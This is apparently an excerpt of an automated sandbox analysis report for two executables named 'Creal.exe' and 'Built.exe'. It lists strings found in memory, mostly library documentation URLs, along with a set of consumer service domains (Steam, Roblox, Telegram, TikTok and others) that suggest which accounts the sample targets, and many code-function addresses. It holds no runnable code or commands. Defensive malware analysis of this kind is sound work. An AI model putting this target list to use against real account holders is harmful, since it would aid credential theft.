              Source: Creal.exe, 00000005.00000003.2372126765.00000203E78E0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2414247478.00000203E7916000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E790C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403607439.00000203E78F7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2412656976.00000203E78F9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2410071917.00000203E78F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://riotgames.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://roblox.com)
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sellix.io)
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/0
              Source: Creal.exe, 00000005.00000003.2153636025.00000203E7418000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2154004007.00000203E742E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
              Source: Creal.exe, 00000005.00000003.2380069030.00000203E7538000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2156593481.00000203E753D000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2404153286.00000203E7538000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2153505234.00000203E7516000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2369898360.00000203E7538000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2371996192.00000203E7538000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2155572489.00000203E753D000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2159623093.00000203E753D000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2160988388.00000203E753D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
              Source: Creal.exe, 00000005.00000002.2418294898.00000203E76A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
              Source: Creal.exe, 00000005.00000002.2418294898.00000203E76A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0
              Source: Creal.exe, 00000005.00000003.2153471711.00000203E77A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;
              Source: Creal.exe, 00000005.00000003.2153471711.00000203E77A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;r
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steam.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)
              Source: Built.exe, 00000004.00000002.2164052765.000002D966F30000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2379589733.00000203E78C0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2384653569.00000203E78C2000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2380439386.00000203E78C2000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: Creal.exe, 00000005.00000003.2403845274.00000203E7B81000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376137526.00000203E8430000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2380581302.00000203E8451000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376742548.00000203E843A000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376177154.00000203E8437000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376890554.00000203E7B7E000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375135249.00000203E7B6F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
              Source: Creal.exe, 00000005.00000003.2403845274.00000203E7B81000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376890554.00000203E7B7E000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375135249.00000203E7B6F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2421077059.00000203E7B92000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
              Source: Built.exe, 00000004.00000002.2166572462.000002D967330000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372126765.00000203E78E0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403607439.00000203E78F7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)
              Source: Built.exe, 00000004.00000002.2162306766.000002D9667F0000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2162686689.000002D966B30000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2367740897.00000203E79A9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403089079.00000203E79F0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372527708.00000203E79E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E79BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375579122.00000203E79E9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372941134.00000203E79DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uber.com)
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warningsp
              Source: Built.exe, 00000004.00000002.2171255511.000002D967DE4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: Built.exe, 00000004.00000002.2170655566.000002D967C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: Creal.exe, 00000005.00000003.2389785541.00000203E78D7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373660739.00000203E78CF000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376802757.00000203E78D5000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2379514476.00000203E78D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
              Source: Creal.exe, 00000005.00000003.2371634055.00000203E7400000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2370196877.00000203E73FF000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374432390.00000203E7429000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372707280.00000203E7428000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2379465483.00000203E742B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
              Source: Creal.exe, 00000002.00000003.2119357168.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
              Source: Creal.exe, 00000002.00000003.2119423482.0000016B5EEC2000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2119357168.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
              Source: Creal.exe, 00000005.00000003.2375828271.00000203E77F9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374358999.00000203E77E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374144942.00000203E77BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
              Source: Built.exe, 00000003.00000003.2107944125.00000124EBC30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2174953160.00007FFD93659000.00000004.00000001.01000000.00000019.sdmp, Built.exe, 00000004.00000002.2178175184.00007FFD93B6A000.00000004.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2433448767.00007FFD8AFE0000.00000002.00000001.01000000.0000002D.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: Creal.exe, 00000005.00000003.2372126765.00000203E78E0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2414247478.00000203E7916000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E790C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403607439.00000203E78F7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2412656976.00000203E78F9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2410071917.00000203E78F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
              Source: Creal.exe, 00000005.00000003.2372707280.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2378468400.00000203E7476000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2163437726.00000203E795D000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2377974542.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374846297.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2370196877.00000203E7459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
              Source: Built.exe, Built.exe, 00000004.00000002.2178299171.00007FFD946E6000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: Built.exe, 00000004.00000002.2178299171.00007FFD945E2000.00000040.00000001.01000000.0000000B.sdmp, Creal.exe, 00000005.00000002.2435297538.00007FFD93FA8000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: Built.exe, 00000004.00000003.2139013017.000002D966BF9000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2138293820.000002D9670BC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2162686689.000002D966BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
              Source: Creal.exe, 00000005.00000003.2377575981.00000203E7B5B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375300692.00000203E7B58000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)
              Source: Built.exe, 00000004.00000003.2138293820.000002D9670DB000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2162686689.000002D966B30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2164052765.000002D9670DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D925DA5C2_2_00007FF6D925DA5C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D924A2DB2_2_00007FF6D924A2DB
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92521642_2_00007FF6D9252164
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92519442_2_00007FF6D9251944
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92539A42_2_00007FF6D92539A4
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D924A4742_2_00007FF6D924A474
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D924ACAD2_2_00007FF6D924ACAD
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9255D302_2_00007FF6D9255D30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9251B502_2_00007FF6D9251B50
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92664182_2_00007FF6D9266418
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92608C82_2_00007FF6D92608C8
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9252C102_2_00007FF6D9252C10
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9263C102_2_00007FF6D9263C10
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9259EA02_2_00007FF6D9259EA0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9265E7C2_2_00007FF6D9265E7C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D925DEF02_2_00007FF6D925DEF0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92697282_2_00007FF6D9269728
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D925E5702_2_00007FF6D925E570
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9251D542_2_00007FF6D9251D54
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92535A02_2_00007FF6D92535A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92618742_2_00007FF6D9261874
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92640AC2_2_00007FF6D92640AC
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92580E42_2_00007FF6D92580E4
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92608C82_2_00007FF6D92608C8
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9251F602_2_00007FF6D9251F60
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92517402_2_00007FF6D9251740
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92587942_2_00007FF6D9258794
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92498002_2_00007FF6D9249800
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2810003_2_00007FF65E281000
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A08C83_2_00007FF65E2A08C8
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A69643_2_00007FF65E2A6964
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2889E03_2_00007FF65E2889E0
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E291F603_2_00007FF65E291F60
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2917403_2_00007FF65E291740
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2987943_2_00007FF65E298794
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2898003_2_00007FF65E289800
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A18743_2_00007FF65E2A1874
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A40AC3_2_00007FF65E2A40AC
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2980E43_2_00007FF65E2980E4
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E29E5703_2_00007FF65E29E570
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E291D543_2_00007FF65E291D54
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2935A03_2_00007FF65E2935A0
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E299EA03_2_00007FF65E299EA0
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A5E7C3_2_00007FF65E2A5E7C
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E29DEF03_2_00007FF65E29DEF0
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A97283_2_00007FF65E2A9728
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E291B503_2_00007FF65E291B50
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A08C83_2_00007FF65E2A08C8
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A64183_2_00007FF65E2A6418
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E292C103_2_00007FF65E292C10
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A3C103_2_00007FF65E2A3C10
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A5C003_2_00007FF65E2A5C00
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E28A4743_2_00007FF65E28A474
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E28ACAD3_2_00007FF65E28ACAD
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E295D303_2_00007FF65E295D30
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2921643_2_00007FF65E292164
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2919443_2_00007FF65E291944
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2939A43_2_00007FF65E2939A4
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E29DA5C3_2_00007FF65E29DA5C
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E28A2DB3_2_00007FF65E28A2DB
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2810004_2_00007FF65E281000
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A69644_2_00007FF65E2A6964
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E291F604_2_00007FF65E291F60
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2917404_2_00007FF65E291740
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2987944_2_00007FF65E298794
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2898004_2_00007FF65E289800
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A18744_2_00007FF65E2A1874
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A40AC4_2_00007FF65E2A40AC
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2980E44_2_00007FF65E2980E4
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A08C84_2_00007FF65E2A08C8
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E29E5704_2_00007FF65E29E570
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E291D544_2_00007FF65E291D54
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2935A04_2_00007FF65E2935A0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E299EA04_2_00007FF65E299EA0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A5E7C4_2_00007FF65E2A5E7C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E29DEF04_2_00007FF65E29DEF0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A97284_2_00007FF65E2A9728
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E291B504_2_00007FF65E291B50
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A08C84_2_00007FF65E2A08C8
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A64184_2_00007FF65E2A6418
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E292C104_2_00007FF65E292C10
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A3C104_2_00007FF65E2A3C10
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A5C004_2_00007FF65E2A5C00
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E28A4744_2_00007FF65E28A474
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E28ACAD4_2_00007FF65E28ACAD
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E295D304_2_00007FF65E295D30
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2921644_2_00007FF65E292164
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2919444_2_00007FF65E291944
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2939A44_2_00007FF65E2939A4
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2889E04_2_00007FF65E2889E0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E29DA5C4_2_00007FF65E29DA5C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E28A2DB4_2_00007FF65E28A2DB
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD924312F04_2_00007FFD924312F0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD924318804_2_00007FFD92431880
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935FD2D04_2_00007FFD935FD2D0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935917F84_2_00007FFD935917F8
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935924DC4_2_00007FFD935924DC
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935927024_2_00007FFD93592702
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD936036504_2_00007FFD93603650
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93591C124_2_00007FFD93591C12
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935D5C004_2_00007FFD935D5C00
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9359155A4_2_00007FFD9359155A
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935D9A604_2_00007FFD935D9A60
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935BBAE04_2_00007FFD935BBAE0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935DD9804_2_00007FFD935DD980
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93657A204_2_00007FFD93657A20
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935915964_2_00007FFD93591596
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935913DE4_2_00007FFD935913DE
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935921C64_2_00007FFD935921C6
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935916544_2_00007FFD93591654
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935B60304_2_00007FFD935B6030
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93591AD74_2_00007FFD93591AD7
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935915464_2_00007FFD93591546
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935921E44_2_00007FFD935921E4
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935DDE504_2_00007FFD935DDE50
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93591FDC4_2_00007FFD93591FDC
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93591D934_2_00007FFD93591D93
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9359116D4_2_00007FFD9359116D
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935987204_2_00007FFD93598720
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935916FE4_2_00007FFD935916FE
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935926174_2_00007FFD93592617
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93591A0F4_2_00007FFD93591A0F
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935916184_2_00007FFD93591618
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD936088704_2_00007FFD93608870
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93591EE24_2_00007FFD93591EE2
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935C89204_2_00007FFD935C8920
